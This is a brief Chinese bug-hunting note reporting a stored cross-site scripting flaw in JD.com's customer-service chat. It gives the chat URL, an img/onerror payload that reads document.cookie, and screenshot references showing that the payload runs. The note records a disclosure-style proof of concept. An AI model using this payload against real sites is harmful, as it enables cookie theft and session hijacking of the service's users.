[关闭]
@1kbfree 2018-10-12T10:20:35.000000Z 字数 153 阅读 2056

客服聊天处存在xss

漏洞挖掘


1、打开Url:https://jtalk.jd.com/?entrance=10001&source=web&companyId=1

输入xss payload然后刷新一下,可以解析,如图

  1. <img/src='x'/onerror=(alert)(document.cookie)>

image_1cpjs5cma1c9pej24mu1nrj1g87p.png-234.1kB

image_1cpjs73do1fkskc10ebplt1tna16.png-126.3kB

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注